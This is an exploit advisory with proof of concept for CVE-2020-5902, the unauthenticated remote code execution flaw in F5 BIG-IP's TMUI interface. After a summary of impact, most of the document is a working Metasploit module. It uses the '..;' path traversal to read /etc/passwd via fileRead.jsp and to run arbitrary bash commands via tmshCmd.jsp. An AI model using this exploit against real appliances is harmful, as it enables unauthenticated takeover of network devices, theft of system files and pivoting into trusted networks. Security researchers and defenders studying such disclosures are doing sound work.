=============================================================================================================================================
| # Title     : F5 BIG-IP TMUI Unauthenticated Remote Code Execution                                                                        |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.f5.com/fr_fr/products/big-ip                                                                                    |
=============================================================================================================================================

[+] Summary    : A critical vulnerability exists in the Traffic Management User Interface (TMUI) component of F5 Networks F5 BIG-IP devices that allows 
                 unauthenticated attackers to perform remote command execution (RCE) through a directory traversal flaw.
                 The issue is tracked as CVE-2020-5902 and affects multiple versions of BIG-IP where the TMUI administrative interface is exposed.
                 The vulnerability stems from improper input validation in TMUI endpoints such as fileRead.jsp and tmshCmd.jsp. 
				 By exploiting a crafted path containing the traversal sequence ..;, an attacker can bypass authentication and access internal JSP components. This allows:

Arbitrary file read (e.g., /etc/passwd)

Execution of system commands via tmsh utilities

Full compromise of the affected BIG-IP system

Attackers can issue specially crafted HTTP requests to the vulnerable TMUI interface, enabling them to execute commands as the underlying system user without authentication.

[+] Successful exploitation may result in:

Remote command execution on the device

Disclosure of sensitive system files

Complete takeover of the BIG-IP appliance

Potential network pivoting if the device sits in a trusted infrastructure position

[+] This vulnerability was publicly disclosed on 1 July 2020 and is considered critical severity, with active exploitation observed shortly after disclosure.

Affected Product: F5 BIG-IP TMUI

Vendor: F5 Networks

CVE:CVE-2020-5902

[+] Impact:

Unauthenticated Remote Code Execution

Arbitrary File Disclosure

Full System Compromise
			  
[+] POC   :  

##
# Exploit Title: F5 BIG-IP TMUI Remote Code Execution
# Framework: Metasploit
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'F5 BIG-IP TMUI Remote Code Execution',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in the
        F5 BIG-IP TMUI interface that allows unauthenticated attackers
        to execute arbitrary system commands via tmshCmd.jsp.
      },
      'Author'         =>
        [
          'indoushka'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2020-5902'],
          ['URL', 'https://support.f5.com/csp/article/K52145254']
        ],
      'Platform'       => 'linux',
      'Arch'           => [ ARCH_CMD ],
      'Targets'        =>
        [
          ['Automatic Target', {}]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2020-07-01'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),
        OptString.new('FILEPATH',  [ false, 'File to read for vulnerability check', '/etc/passwd' ])
      ]
    )
  end
  def check
    print_status("Checking if target is vulnerable...")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(
        target_uri.path,
        'tmui',
        'login.jsp',
        '..;',
        'tmui',
        'locallb',
        'workspace',
        'fileRead.jsp'
      ),
      'vars_get' =>
      {
        'fileName' => datastore['FILEPATH']
      }
    })

    return CheckCode::Unknown unless res

    if res.code == 200 && res.body.include?('root:')
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  end

  def exploit
    print_status("Launching exploit...")

    execute_command(payload.encoded)
  end
  def execute_command(cmd, opts = {})
    vprint_status("Executing command: #{cmd}")

    encoded = Rex::Text.uri_encode("run util bash -c '#{cmd}'")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(
        target_uri.path,
        'tmui',
        'login.jsp',
        '..;',
        'tmui',
        'locallb',
        'workspace',
        'tmshCmd.jsp'
      ),
      'vars_get' =>
      {
        'command' => encoded
      }
    })

    fail_with(Failure::Unknown, "No response from server") unless res
  end
end

	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================